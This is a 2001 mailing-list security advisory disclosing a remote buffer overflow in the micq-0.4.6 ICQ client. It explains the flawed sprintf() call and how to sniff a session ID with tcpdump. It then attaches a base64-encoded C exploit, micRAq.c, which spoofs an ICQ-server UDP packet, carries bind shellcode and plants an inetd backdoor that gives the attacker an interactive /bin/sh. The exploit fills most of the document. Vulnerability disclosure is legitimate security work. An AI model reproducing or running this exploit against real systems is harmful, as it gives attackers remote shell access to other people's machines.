Date: Thu, 18 Jan 2001 10:01:59 -0000
From: recidjvo <[email protected]>
To: [email protected]Subject: [PkC] Advisory #003: micq-0.4.6 remote buffer overflow
This is a multi-part message in MIME format.
----------part3a66bf179034e
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
/* pkc003.txt */
-=[ SECURITY ADVISORY #003 ]=-
_____________ _______
| \ [www.pkcrew.org] / \
\ | ______ / ___ \
| | |_ _| ___ | / \___|
| | | | / _| | |
| _______/ | | / / | |
| / | _ < | | ___
| | [PkC] | | \ \ | \_____/ |
_| |_ _| |_ \ \_ \ |
|_______| |______| |____| \__________/
[ Packet Knights Crew ]
-=[ SECURITY ADVISORY #003 ]=-
- Vulnerable program: micq-0.4.6 (Matt's ICQ clone). Maybe others.
- Tested on: Linux/ix86 (Slackware 7.1 - RedHat 6.1)
- Advisory author: tHE rECIdjVO <[email protected]>
- Group: Packet Knights (http://www.pkcrew.org/)
- Date of release: 01/18/2000
- Problems: Remote buffer overflow
Local buffer overflow (not dangerous if not suid)
- Impact: Remote vulnerablity allows to execute arbitrary code with
the UID/GID of the user running micq.
- Risk level: HIGH!
- Exploit: Simple remote shell exploit for Linux/ix86 attached.
- Dedicated to: Francesca (I'll never forget you :*)
- Credits: The possible problem was signaled by |CyRaX| and asynchro.
Thanks to Nail for some crazy ideas :)
- Greetings: Mozarela mia sinta giganta.
All PkC members, expecially |CyRaX| and asynchro.
All IRCNet friends, expecially Guybrush and IISBOSS.
All my Undernet bros.
My mom.
LOA guys.
cat ~/friends/*
- Summary:
micq-0.4.6 is one of the best ICQ emulator for linux console.
There is a buffer overflow in sprintf() in icq_response.c in function
Do_Msg() at line 879, that allows to a remote attacker able to sniff
packets to ICQ server to execute arbitrary code on the victim system.
There is a local buffer overflow, too.
If you send an URL message with a too large description, the program
receives a SIGSEGV.
Because of the program is not suid, I don't analyze this bof further
more.
- Details:
[ ... snip ... icq_response.c ... snip ... ]
void Do_Msg( SOK_T sok, DWORD type, WORD len, char * data, DWORD uin )
{
char *tmp;
int x,m;
char message[1024];
char url_data[1024];
char url_desc[1024];
[ ... ]
else if (type == URL_MESS || type == MRURL_MESS)
{
tmp = strchr( data, '\xFE' );
if ( tmp == NULL )
{
M_print( "Ack!!!!!!! Bad packet" );
return;
}
*tmp = 0;
char_conv ("wc",data);
strcpy (url_desc,data);
tmp++;
data = tmp;
char_conv ("wc",data);
strcpy (url_data,data);
===> sprintf (message,"Description: %s \n URL: %s",
===> url_desc,url_data);
if ( UIN2nick( uin ) != NULL )
log_event( uin, LOG_MESS, "You received URL message from %s\n%s\n",
UIN2nick(uin), message );
else
log_event( uin, LOG_MESS, "You received URL message from %d\n%s\n",
uin, message );
M_print( " URL Message.\n Description: " MESSCOL "%s" NOCOL "\n",
url_desc );
M_print( " URL : " MESSCOL "%s" NOCOL "\n",
url_data );
}
[ ... snip ... icq_response.c ... snip ... ]
The buffer overflow is due to a malicious URL message sent by the
server. The client reads 1024 bytes from the UDP socket, trim the
message headers and split the remaining data in the 1024 bytes
url_data and url_desc, recombining in the message char buffer, adding
about fifty digits. Because of the url_data is 1024 bytes long, this
instruction can be used to overwrite the return address of the
function
and execute arbitrary code on the client machine.
- Solution:
A simple patch can be to increase the message buffer size up to 50
bytes. I've not tested if there are others problem fixin' in that way.
I tryed to alert the micq author (Matt Smith), but homepage is out of
order and email is unexistant.
- Exploit:
An exploit for Linux/ix86 is attached.
Exploiting this bof is a little hard.
The main problem is that we need a large amount of data to be send as
URL, but ICQ servers seem to trim packets bigger than 500 bytes.
So the mad way I've found is to spoof ICQ server and send the
malicious
packet directly to the client (micq only uses server connection).
In order to make it works, we need some extra data on the connection,
that requires sniffing at least one packet from the existant
connection,
like <hex_session>, that identify the connection. This can be done
easily with tcpdump 3.6.1 (http://www.tcpdump.org/). Let's see how:
(data and ip are random)
[root@pkcrew:~]# tcpdump -i eth0 -s 49 -tnx udp src port 4000
tcpdump: listening on eth0
[ ... ]
205.188.153.105.4000 > 32.96.111.130.1080: udp 21 (DF)
4500 0031 747f 4000 eb11 a72c cdbc 996a
ceb6 3e32 0fa0 0501 001d 4c3d 0500 00f4
b10f 5a
[ ... ]
16 packets received by filter
0 packets dropped by kernel
[root@pkcrew:~]#
(<hex_session> is the last 4 shown bytes)
Now we have all the data we need.
Let's try to exploit this (don't try THIS ;)
[root@pkcrew:~]# ./micRAq 32.96.111.130 1080 205.188.153.105 f4b10f4a
[ [ micRAq ] - by tHE rECIdjVO <[email protected]> ]
Packet Knights - http://www.pkcrew.org/
Using buffer address: 0xbfffedb0
"To be, or not to be.
This is the question."
(William Shakespere)
Trying 32.96.111.130...
Connected to 32.96.111.130.
Escape character is '^]'.
bash$
Good :P
The program sends a spoofed UDP packet formatted to be parsed as an
URL
message, but with malicious code in it. It was written using my linux
buffer address and offset, but it can be easily changed for other
situations.
The shellcode open a shell on port 3879/tcp, then the exploit sends
the execution of a inetd session with a shell binded on port
10000/tcp,
and execl() to telnet on that port, giving you an interactive sh on
the
remote machine.
WARNING: when micq crashes, it prints the malicious URL, so on the
other side the victim see a lot of unprintable characters
and the /bin/sh string too.
That's all ;)
/* pkc003.txt */
--
tHE rECIdjVO
Member of the Packet Knights
http://www.pkcrew.org/
----------part3a66bf179034e
Content-Type: application/octet-stream; name="micRAq.c"
Content-Transfer-Encoding: base64
LyoNCiAgICAgICAgICAgICAgICBbIG1pY1JBcSBdIC0gYnkgdEhFIHJFQ0lkalZPIDxyZWNpZGp2
b0Bwa2NyZXcub3JnPg0KICAgICAgICAgICAgICAgICAgICAgICAgUGFja2V0IEtuaWdodHMgLSBo
dHRwOi8vd3d3LnBrY3Jldy5vcmcvDQoNCiAgIC0gdmVyc2lvbiBhZmZlY3RlZDogbWljcS0wLjQu
NiAtIG1heWJlIG90aGVycyAoaHR0cDovL2ZyZXNobWVhdC5uZXQvKQ0KICAgLSBjb2RlZCBmb3I6
IGl4ODYvTGludXgtMi4yLjE2DQogICAtIGdjYyB2ZXJzaW9uOiBlZ2NzLTIuOTEuNjYNCg0KICAg
dXNhZ2U6IC4vbWljUkFxIDxjbGllbnRfaXA+IDxjbGllbnRfcG9ydD4gPHNlcnZlcl9pcD4gPGhl
eF9zZXNzaW9uPiBbYWRkcmVzc10NCg0KICAgUGxlYXNlIHJlYWQgUGtDIEFkdmlzb3J5ICMwMDMg
Zmlyc3QuDQogICBDYXRjaCBwYXJhbWV0ZXJzIHdpdGggdGNwZHVtcC0zLjYuMSAoaHR0cDovL3d3
dy50Y3BkdW1wLm9yZy8pDQogICBMYXN0IDQgc2hvd24gYnl0ZXMgYXJlIDxoZXhfc2Vzc2lvbj4N
CiAgICMgdGNwZHVtcCAtaSA8aW50ZXJmYWNlPiAtcyA0OSAtdG54IHVkcCBzcmMgcG9ydCA0MDAw
DQoNCiAgIERlZGljYXRlZCB0bzogRnJhbmNlc2NhIChJJ2xsIG5ldmVyIGZvcmdldCB5b3UgOiop
DQogICBUbng6IHxDeVJhWHwsIGFzeW5jaHJvLCB2ZWNuYSwgTmFpbCwgW25ka10sIE1hdE9mUGVu
Zw0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAqLw0KDQojZGVmaW5lIERFRkFVTFRfQlVGRkVSX0FERFJFU1Mg
MHhiZmZmZWVhMA0KI2RlZmluZSBPRkZTRVQgOTkxDQojZGVmaW5lIElDUV9TRVJWRVJfUE9SVCA0
MDAwDQojZGVmaW5lIEJBQ0tfUE9SVCAiMTAxMDUiDQojZGVmaW5lIE5PUCAnXHg5MCcNCiNkZWZp
bmUgQ09NTUFORCAiZWNobyAtZSBcIiIgQkFDS19QT1JUICIgc3RyZWFtIHRjcCBub3dhaXQgYHdo
b2FtaWAgL2Jpbi9zaCBzaCAtaVwiPi90bXAvLm1pY1JBcWJkOy91c3Ivc2Jpbi9pbmV0ZCAvdG1w
Ly5taWNSQXFiZDtzbGVlcCAxO3JtIC90bXAvLm1pY1JBcWJkO2V4aXQ7Ig0KDQojaW5jbHVkZSA8
c3RkaW8uaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNp
bmNsdWRlIDxzeXMvc29ja2V0Lmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUg
PG5ldGluZXQvaXAuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L3VkcC5oPg0KDQppbnQgbWFpbihpbnQg
YXJnYywgY2hhciAqYXJndltdKTsNCnVuc2lnbmVkIHNob3J0IGluX2Nrc3VtICh1X3Nob3J0ICph
ZGRyLCBpbnQgbGVuKTsgLy8gUmlwcGVkLiBXaG8gZGlkbid0IGl0PyA7KQ0Kdm9pZCBidWlsZF9i
dWZmZXIoY2hhciAqYnVmZmVyLCB1bnNpZ25lZCBsb25nICpidWZmX2FkZHIpOw0KaW50IGdvKGNo
YXIgKmlwKTsNCg0KLy8gYmluZCBzaGVsbGNvZGUgYnkgW211bHRpcGxlXQ0KY2hhciBzaGVsbGNv
ZGVbXT0NCiAgICAgICAgIlx4ODlceGU1XHgzMVx4ZDJceGIyXHg2Nlx4ODlceGQwXHgzMVx4Yzlc
eDg5XHhjYlx4NDNceDg5XHg1ZFx4ZjgiDQogICAgICAgICJceDQzXHg4OVx4NWRceGY0XHg0Ylx4
ODlceDRkXHhmY1x4OGRceDRkXHhmNFx4Y2RceDgwXHgzMVx4YzlceDg5Ig0KICAgICAgICAiXHg0
NVx4ZjRceDQzXHg2Nlx4ODlceDVkXHhlY1x4NjZceGM3XHg0NVx4ZWVceDBmXHgyN1x4ODlceDRk
XHhmMCINCiAgICAgICAgIlx4OGRceDQ1XHhlY1x4ODlceDQ1XHhmOFx4YzZceDQ1XHhmY1x4MTBc
eDg5XHhkMFx4OGRceDRkXHhmNFx4Y2QiDQogICAgICAgICJceDgwXHg4OVx4ZDBceDQzXHg0M1x4
Y2RceDgwXHg4OVx4ZDBceDQzXHhjZFx4ODBceDg5XHhjM1x4MzFceGM5Ig0KICAgICAgICAiXHhi
Mlx4M2ZceDg5XHhkMFx4Y2RceDgwXHg4OVx4ZDBceDQxXHhjZFx4ODBceGViXHgxOFx4NWVceDg5
XHg3NSINCiAgICAgICAgIlx4MDhceDMxXHhjMFx4ODhceDQ2XHgwN1x4ODlceDQ1XHgwY1x4YjBc
eDBiXHg4OVx4ZjNceDhkXHg0ZFx4MDgiDQogICAgICAgICJceDhkXHg1NVx4MGNceGNkXHg4MFx4
ZThceGUzXHhmZlx4ZmZceGZmL2Jpbi9zaCI7DQoNCnR5cGVkZWYgc3RydWN0DQp7DQogICAgICAg
IHVuc2lnbmVkIGNoYXIgdWluWzRdOw0KICAgICAgICB1bnNpZ25lZCBjaGFyIHllYXJbMl07DQog
ICAgICAgIHVuc2lnbmVkIGNoYXIgbW9udGg7DQogICAgICAgIHVuc2lnbmVkIGNoYXIgZGF5Ow0K
ICAgICAgICB1bnNpZ25lZCBjaGFyIGhvdXI7DQogICAgICAgIHVuc2lnbmVkIGNoYXIgbWludXRl
Ow0KICAgICAgICB1bnNpZ25lZCBjaGFyIHR5cGVbMl07DQogICAgICAgIHVuc2lnbmVkIGNoYXIg
bGVuWzJdOw0KfSBSRUNWX01FU1NBR0UsICpSRUNWX01FU1NBR0VfUFRSOw0KDQpzdHJ1Y3QgU1JW
X0lDUV9wYWsNCnsNCiAgICAgICAgdW5zaWduZWQgY2hhciB2ZXJbMl07DQogICAgICAgIHVuc2ln
bmVkIGNoYXIgemVybzsNCiAgICAgICAgdW5zaWduZWQgY2hhciBzZXNzaW9uWzRdOw0KICAgICAg
ICB1bnNpZ25lZCBjaGFyIGNtZFsyXTsNCiAgICAgICAgdW5zaWduZWQgY2hhciBzZXFbMl07DQog
ICAgICAgIHVuc2lnbmVkIGNoYXIgc2VxMlsyXTsNCiAgICAgICAgdW5zaWduZWQgY2hhciBVSU5b
NF07DQogICAgICAgIHVuc2lnbmVkIGNoYXIgY2hlY2tbNF07DQp9Ow0KDQpzdHJ1Y3Qgc3J2X25l
dF9pY3FfcGFrDQp7DQogICAgICAgIHN0cnVjdCBTUlZfSUNRX3BhayBoZWFkOw0KICAgICAgICB1
bnNpZ25lZCBjaGFyIGRhdGFbMTAyNF07DQp9Ow0KDQp1bnNpZ25lZCBzaG9ydCBpbl9ja3N1bSAo
dV9zaG9ydCAqYWRkciwgaW50IGxlbikNCnsNCiAgICAgICAgcmVnaXN0ZXIgaW50IG5sZWZ0ID0g
bGVuOw0KICAgICAgICByZWdpc3RlciB1X3Nob3J0ICp3ID0gYWRkcjsNCiAgICAgICAgcmVnaXN0
ZXIgaW50IHN1bSA9IDA7DQogICAgICAgIHVfc2hvcnQgYW5zd2VyID0gMDsNCg0KICAgICAgICB3
aGlsZSAobmxlZnQgPiAxKSB7DQogICAgICAgICAgICAgICAgc3VtICs9ICp3Kys7DQogICAgICAg
ICAgICAgICAgbmxlZnQgLT0gMjsNCiAgICAgICAgfQ0KICAgICAgICBpZiAobmxlZnQgPT0gMSkg
ew0KICAgICAgICAgICAgICAgICoodV9jaGFyICopKCZhbnN3ZXIpID0gKih1X2NoYXIgKil3Ow0K
ICAgICAgICAgICAgICAgIHN1bSArPSBhbnN3ZXI7DQogICAgICAgIH0NCg0KICAgICAgICBzdW0g
PSAoc3VtID4+IDE2KSArIChzdW0gJiAweGZmZmYpOw0KICAgICAgICBzdW0gKz0gKHN1bSA+PiAx
Nik7DQogICAgICAgIGFuc3dlciA9IH5zdW07DQogICAgICAgIHJldHVybihhbnN3ZXIpOw0KfQ0K
DQp2b2lkIGJ1aWxkX2J1ZmZlcihjaGFyICpidWZmZXIsIHVuc2lnbmVkIGxvbmcgKmJ1ZmZfYWRk
cikNCnsNCiAgICAgICAgLy8gRmlsbCB0aGUgZGF0YSBoZWFkZXJzDQogICAgICAgIG1lbXNldChi
dWZmZXIsICdcYicsIDEwMjQpOw0KICAgICAgICBtZW1zZXQoYnVmZmVyLCAnXDAnLCA3KTsNCiAg
ICAgICAgYnVmZmVyWzRdID0gJ1x4MDQnOw0KICAgICAgICBidWZmZXJbOF0gPSAnXHhGRSc7DQoN
CiAgICAgICAgLy8gRmlsbCB0aGUgYnVmZmVyDQogICAgICAgIG1lbXNldChidWZmZXIgKyA5LCBO
T1AsIHN0cnRvdWwoYnVmZmVyLCBOVUxMLCAxMCkgKyBPRkZTRVQgLSBzdHJsZW4oc2hlbGxjb2Rl
KSAtIDkpOw0KICAgICAgICBtZW1jcHkoYnVmZmVyICsgT0ZGU0VUIC0gc3RybGVuKHNoZWxsY29k
ZSksIHNoZWxsY29kZSwgc3RybGVuKHNoZWxsY29kZSkpOw0KICAgICAgICBtZW1jcHkoYnVmZmVy
ICsgT0ZGU0VULCBidWZmX2FkZHIsIDQpOw0KICAgICAgICBidWZmZXJbMTAyM10gPSAnXDAnOw0K
ICAgICAgICByZXR1cm47DQp9ICAgICAgIA0KDQppbnQgZ28oY2hhciAqaXApDQp7DQogICAgICAg
IGludCBzb2NrLCBjb25uOw0KICAgICAgICBzdHJ1Y3Qgc29ja2FkZHJfaW4gc2FkZHI7DQoNCiAg
ICAgICAgLy8gQ3JlYXRlIHNvY2tldA0KICAgICAgICBpZigoc29jayA9IHNvY2tldChBRl9JTkVU
LCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApKSA8IDApIHsNCiAgICAgICAgICAgICAgICBwZXJy
b3IoInNvY2tldCgpIik7DQogICAgICAgICAgICAgICAgcmV0dXJuKC0xKTsNCiAgICAgICAgfQ0K
DQogICAgICAgIHNhZGRyLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICAgICAgICBzYWRkci5zaW5f
YWRkci5zX2FkZHIgPSBpbmV0X2FkZHIoaXApOw0KICAgICAgICBzYWRkci5zaW5fcG9ydCA9IGh0
b25zKDM4NzkpOw0KDQogICAgICAgIC8vIENvbm5lY3QgdG8gMzg3OSBhbmQgaXNzdWUgQ09NTUFO
RA0KICAgICAgICBpZigoY29ubiA9IGNvbm5lY3Qoc29jaywgKHN0cnVjdCBzb2NrYWRkciAqKSZz
YWRkciwgc2l6ZW9mKHNhZGRyKSkpIDwgMCkgew0KICAgICAgICAgICAgICAgIHBlcnJvcigiY29u
bmVjdCgpIik7DQogICAgICAgICAgICAgICAgcmV0dXJuKC0xKTsNCiAgICAgICAgfQ0KDQogICAg
ICAgIHNlbmQoc29jaywgQ09NTUFORCwgc2l6ZW9mKENPTU1BTkQpLCAwKTsNCg0KICAgICAgICAv
LyBBbGwgZG9uZSBoZXJlDQogICAgICAgIGNsb3NlKHNvY2spOw0KICAgICAgICByZXR1cm4oMCk7
DQp9DQoNCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogICAgICAgIGludCBz
b2NrLCBpLCBoaW5jbCA9IDE7DQogICAgICAgIHVuc2lnbmVkIGxvbmcgYnVmZl9hZGRyID0gREVG
QVVMVF9CVUZGRVJfQUREUkVTUzsNCiAgICAgICAgc3RydWN0IHNvY2thZGRyX2luIHNhZGRyOw0K
ICAgICAgICBzdHJ1Y3QgaXAgKnBpcDsNCiAgICAgICAgc3RydWN0IHVkcGhkciAqcHVkcDsNCiAg
ICAgICAgY2hhciAqcGFja2V0LCBjb252WzNdOw0KICAgICAgICBzdHJ1Y3Qgc3J2X25ldF9pY3Ff
cGFrICpwYWs7DQogICAgICAgIFJFQ1ZfTUVTU0FHRV9QVFIgcl9kYXRhOw0KDQogICAgICAgIHBy
aW50ZigiXG5cdFsgWyBtaWNSQXEgXSAtIGJ5IHRIRSByRUNJZGpWTyA8cmVjaWRqdm9AcGtjcmV3
Lm9yZz4gXVxuXHRcdFBhY2tldCBLbmlnaHRzIC0gaHR0cDovL3d3dy5wa2NyZXcub3JnL1xuXG4i
KTsNCg0KICAgICAgICBpZigoYXJnYyAhPSA1KSAmJiAoYXJnYyAhPSA2KSkgew0KICAgICAgICAg
ICAgICAgIHByaW50ZigidXNhZ2U6ICVzIDxjbGllbnRfaXA+IDxjbGllbnRfcG9ydD4gPHNlcnZl
cl9pcD4gPGhleF9zZXNzaW9uPiBbYnVmZmVyXVxuXG4iLCBhcmd2WzBdKTsNCiAgICAgICAgICAg
ICAgICBleGl0KC0xKTsNCiAgICAgICAgfQ0KDQogICAgICAgIGlmKHN0cmxlbihhcmd2WzRdKSAh
PSA4KSB7DQogICAgICAgICAgICAgICAgcHJpbnRmKCJFcnJvcjogPHNlc3Npb24+IG11c3QgYmUg
OCBkaWdpdHMgZXhhZGVjaW1hbCBudW1iZXIuXG5cbiIpOw0KICAgICAgICAgICAgICAgIGV4aXQo
LTEpOw0KICAgICAgICB9DQoNCiAgICAgICAgaWYoYXJnYyA9PSA2KSB7DQogICAgICAgICAgICAg
ICAgYnVmZl9hZGRyID0gc3RydG91bChhcmd2WzVdLCBOVUxMLCAxNik7DQogICAgICAgIH0NCiAg
ICAgICAgcHJpbnRmKCJVc2luZyBidWZmZXIgYWRkcmVzczogMHgleFxuXG4iLCBidWZmX2FkZHIp
Ow0KDQogICAgICAgIC8vIENyZWF0ZSB0aGUgUkFXIHNvY2tldA0KICAgICAgICBpZigoc29jayA9
IHNvY2tldChBRl9JTkVULCBTT0NLX1JBVywgSVBQUk9UT19SQVcpKSA8IDApIHsNCiAgICAgICAg
ICAgICAgICBwZXJyb3IoInNvY2tldCgpIik7DQogICAgICAgICAgICAgICAgZXhpdCgtMSk7DQog
ICAgICAgIH0NCg0KICAgICAgICBpZihzZXRzb2Nrb3B0KHNvY2ssIElQUFJPVE9fSVAsIElQX0hE
UklOQ0wsICZoaW5jbCwgc2l6ZW9mKGhpbmNsKSkgPCAwKSB7DQogICAgICAgICAgICAgICAgcGVy
cm9yKCJzZXRzb2Nrb3B0KCkiKTsNCiAgICAgICAgICAgICAgICBjbG9zZShzb2NrKTsNCiAgICAg
ICAgICAgICAgICBleGl0KC0xKTsNCiAgICAgICAgfQ0KDQogICAgICAgIC8vIFNldCBwb2ludGVy
cw0KICAgICAgICBwYWNrZXQgPSBtYWxsb2Moc2l6ZW9mKHN0cnVjdCBpcCkgKyBzaXplb2Yoc3Ry
dWN0IHVkcGhkcikgKyAxMDI0KTsNCiAgICAgICAgcGlwID0gKHN0cnVjdCBpcCAqKXBhY2tldDsN
CiAgICAgICAgcHVkcCA9IChzdHJ1Y3QgdWRwaGRyICopKHBhY2tldCArIHNpemVvZihzdHJ1Y3Qg
aXApKTsNCiAgICAgICAgcGFrID0gKHN0cnVjdCBzcnZfbmV0X2ljcV9wYWsgKikocGFja2V0ICsg
c2l6ZW9mKHN0cnVjdCBpcCkgKyBzaXplb2Yoc3RydWN0IHVkcGhkcikpOw0KDQogICAgICAgIC8v
IENsZWFyIHBhY2tldA0KICAgICAgICBtZW1zZXQocGFja2V0LCAwLCBzaXplb2Yoc3RydWN0IGlw
KSArIHNpemVvZihzdHJ1Y3QgdWRwaGRyKSArIDEwMjQpOw0KDQogICAgICAgIC8vIEZpbGwgdGhl
IHBhY2tldCBoZWFkZXJzDQogICAgICAgIHNhZGRyLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICAg
ICAgICBzYWRkci5zaW5fYWRkci5zX2FkZHIgPSBpbmV0X2FkZHIoYXJndlsxXSk7DQogICAgICAg
IHBpcC0+aXBfbGVuID0gaHRvbnMoc2l6ZW9mKHN0cnVjdCBpcCkgKyBzaXplb2Yoc3RydWN0IHVk
cGhkcikgKyAxMDI0KTsNCiAgICAgICAgcGlwLT5pcF9obCA9IDU7DQogICAgICAgIHBpcC0+aXBf
diA9IDQ7DQogICAgICAgIHBpcC0+aXBfdHRsID0gMjU1Ow0KICAgICAgICBwaXAtPmlwX3RvcyA9
IDA7DQogICAgICAgIHBpcC0+aXBfb2ZmID0gMDsNCiAgICAgICAgcGlwLT5pcF9pZCA9IGh0b25z
KGdldHBpZCgpKTsNCiAgICAgICAgcGlwLT5pcF9wID0gSVBQUk9UT19VRFA7DQogICAgICAgIHBp
cC0+aXBfc3JjLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzNdKTsNCiAgICAgICAgcGlwLT5pcF9k
c3Quc19hZGRyID0gaW5ldF9hZGRyKGFyZ3ZbMV0pOw0KICAgICAgICBwaXAtPmlwX3N1bSA9IGlu
X2Nrc3VtKCh1X3Nob3J0KilwaXAsIHNpemVvZihzdHJ1Y3QgaXApKTsNCiAgICAgICAgcHVkcC0+
c291cmNlID0gaHRvbnMoSUNRX1NFUlZFUl9QT1JUKTsNCiAgICAgICAgcHVkcC0+ZGVzdCA9IGh0
b25zKGF0b2koYXJndlsyXSkpOw0KICAgICAgICBwdWRwLT5sZW4gPSBodG9ucyhzaXplb2Yoc3Ry
dWN0IHVkcGhkcikgKyAxMDI0KTsNCiAgICAgICAgcHVkcC0+Y2hlY2sgPSAwOw0KDQogICAgICAg
IC8vIEZpbGwgdGhlIG1lc3NhZ2UgaGVhZGVycw0KICAgICAgICBwYWstPmhlYWQudmVyWzBdID0g
NTsNCiAgICAgICAgcGFrLT5oZWFkLnZlclsxXSA9IDA7DQogICAgICAgIHBhay0+aGVhZC56ZXJv
ID0gMDsNCg0KICAgICAgICBmb3IoaSA9IDA7IGkgPCA4OyBpICs9IDIpIHsNCiAgICAgICAgICAg
ICAgICBjb252WzBdID0gYXJndls0XVtpXTsNCiAgICAgICAgICAgICAgICBjb252WzFdID0gYXJn
dls0XVtpICsgMV07DQogICAgICAgICAgICAgICAgY29udlsyXSA9ICdcMCc7DQoNCiAgICAgICAg
ICAgICAgICBwYWstPmhlYWQuc2Vzc2lvbltpIC8gMl0gPSBzdHJ0b2woY29udiwgTlVMTCwgMTYp
Ow0KICAgICAgICB9DQoNCiAgICAgICAgcGFrLT5oZWFkLmNtZFswXSA9IDQ7DQogICAgICAgIHBh
ay0+aGVhZC5jbWRbMV0gPSAxOw0KICAgICAgICBwYWstPmhlYWQuc2VxWzBdID0gMDsNCiAgICAg
ICAgcGFrLT5oZWFkLnNlcVsxXSA9IDA7DQogICAgICAgIHBhay0+aGVhZC5zZXEyWzBdID0gMDsN
CiAgICAgICAgcGFrLT5oZWFkLnNlcTJbMV0gPSAwOw0KICAgICAgICBwYWstPmhlYWQuVUlOWzBd
ID0gMDsNCiAgICAgICAgcGFrLT5oZWFkLlVJTlsxXSA9IDA7DQogICAgICAgIHBhay0+aGVhZC5V
SU5bMl0gPSAwOw0KICAgICAgICBwYWstPmhlYWQuVUlOWzNdID0gMDsNCiAgICAgICAgcGFrLT5o
ZWFkLmNoZWNrWzBdID0gMDsNCiAgICAgICAgcGFrLT5oZWFkLmNoZWNrWzFdID0gMDsNCiAgICAg
ICAgcGFrLT5oZWFkLmNoZWNrWzJdID0gMDsNCiAgICAgICAgcGFrLT5oZWFkLmNoZWNrWzNdID0g
MDsNCg0KICAgICAgICAvLyBGaWxsIHRoZSBidWZmZXINCiAgICAgICAgYnVpbGRfYnVmZmVyKHBh
ay0+ZGF0YSwgJmJ1ZmZfYWRkcik7DQoNCiAgICAgICAgLy8gU2VuZCB0aGUgcGFja2V0DQogICAg
ICAgIGlmKHNlbmR0byhzb2NrLCBwYWNrZXQsIHNpemVvZihzdHJ1Y3QgaXApICsgc2l6ZW9mKHN0
cnVjdCB1ZHBoZHIpICsgMTAyNCwgMCwgKHN0cnVjdCBzb2NrYWRkciAqKSZzYWRkciwgc2l6ZW9m
KHN0cnVjdCBzb2NrYWRkcl9pbikpIDwgMCkgew0KICAgICAgICAgICAgICAgIHBlcnJvcigic2Vu
ZHRvKCkiKTsNCiAgICAgICAgICAgICAgICBjbG9zZShzb2NrKTsNCiAgICAgICAgICAgICAgICBl
eGl0KC0xKTsNCiAgICAgICAgfQ0KDQogICAgICAgIC8vIENsZWFyIHRoZSBzb2NrZXQNCiAgICAg
ICAgY2xvc2Uoc29jayk7DQoNCiAgICAgICAgLy8gU2VuZCBjb21tYW5kIHRvIGV4ZWN1dGUgaW5l
dGQgYmFja2Rvb3INCiAgICAgICAgc2xlZXAoMSk7DQoNCiAgICAgICAgLy8gRmlyc3QgY29ubmVj
dA0KICAgICAgICBpZihnbyhhcmd2WzFdKSA8IDApIHsNCiAgICAgICAgICAgICAgICBwcmludGYo
IlVuYWJsZSB0byBjb25uZWN0IDpcXFxuIik7DQogICAgICAgICAgICAgICAgZXhpdCgtMSk7DQog
ICAgICAgIH0NCg0KICAgICAgICAvLyBXYWl0IGEgYml0IHRvIGxldCB0aGUgY29tbWFuZCB0byBi
ZSBpc3N1ZWQNCiAgICAgICAgc2xlZXAoMSk7DQogICAgICAgIHByaW50ZigiXHRcIlRvIGJlIik7
DQogICAgICAgIGZmbHVzaChzdGRvdXQpOw0KICAgICAgICBzbGVlcCgyKTsNCiAgICAgICAgcHJp
bnRmKCIsIG9yIG5vdCB0byBiZS5cbiIpOw0KICAgICAgICBzbGVlcCgxKTsNCiAgICAgICAgcHJp
bnRmKCJcdCBUaGlzIGlzIHRoZSBxdWVzdGlvbi5cIlxuIik7DQogICAgICAgIHNsZWVwKDEpOw0K
ICAgICAgICBwcmludGYoIlx0XHRcdChXaWxsaWFtIFNoYWtlc3BlYXJlKVxuXG4iKTsNCg0KICAg
ICAgICAvLyBDb25uZWN0IHRvIHJlbW90ZSBob3N0DQogICAgICAgIGV4ZWNsKCIvdXNyL2Jpbi90
ZWxuZXQiLCAidGVsbmV0IiwgYXJndlsxXSwgQkFDS19QT1JULCBOVUxMKTsNCg0KICAgICAgICAv
LyBOZXZlciBiZWVuIGhlcmUNCiAgICAgICAgZXhpdCgtMSk7DQp9DQoNCi8qICAgICAgICAgICAg
ICAgICAgICAgICAgICBtaWNSQXEuYyAtIEVPRiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICovDQo=
